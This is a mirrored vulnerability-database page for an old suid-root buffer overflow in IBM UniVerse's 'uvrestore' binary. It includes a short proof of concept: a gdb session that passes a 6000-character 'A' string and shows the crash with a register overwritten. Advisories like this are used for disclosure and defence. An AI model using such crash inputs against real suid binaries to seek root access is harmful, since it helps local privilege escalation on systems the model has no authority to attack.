IBM U2 UniVerse 10.0.0.9 – ‘uvrestore’ Buffer Overflow (PoC)

IBM U2 UniVerse 10.0.0.9 – ‘uvrestore’ Buffer Overflow (PoC)

漏洞ID 1054038 漏洞类型
发布时间 2003-07-16 更新时间 2003-07-16
图片[1]-IBM U2 UniVerse 10.0.0.9 – ‘uvrestore’ Buffer Overflow (PoC)-安全小百科CVE编号 N/A
图片[2]-IBM U2 UniVerse 10.0.0.9 – ‘uvrestore’ Buffer Overflow (PoC)-安全小百科CNNVD-ID N/A
漏洞平台 Unix CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22918
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8206/info

It has been reported that the uvrestore binary does not perform bounds checking when parsing command-line arguments. Because this binary is installed with suid root privileges by default, local attackers my be able to exploit this vulnerability to elevate privileges.

While this vulnerability was reported in UniVerse version 10.0.0.9, previous versions are likely vulnerable as well.

(gdb) r `perl -e 'print "A" x 6000'` 
Starting program: uvrestore `perl -e 'print "A" x 6000'`
Program received signal SIGSEGV, Segmentation fault.
0x0805e81a in basename ()
(gdb) bt
#0 0x0805e81a in basename ()
#1 0x080619b3 in basename ()
#2 0x42015574 in libc_start_main () from /lib/tls/libc.so.6
(gdb) i r
eax 0x41414141 1094795585

相关推荐: AIX frcactrl Insecure File Handling Vulnerability

AIX frcactrl Insecure File Handling Vulnerability 漏洞ID 1104197 漏洞类型 Access Validation Error 发布时间 2000-04-26 更新时间 2000-04-26 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享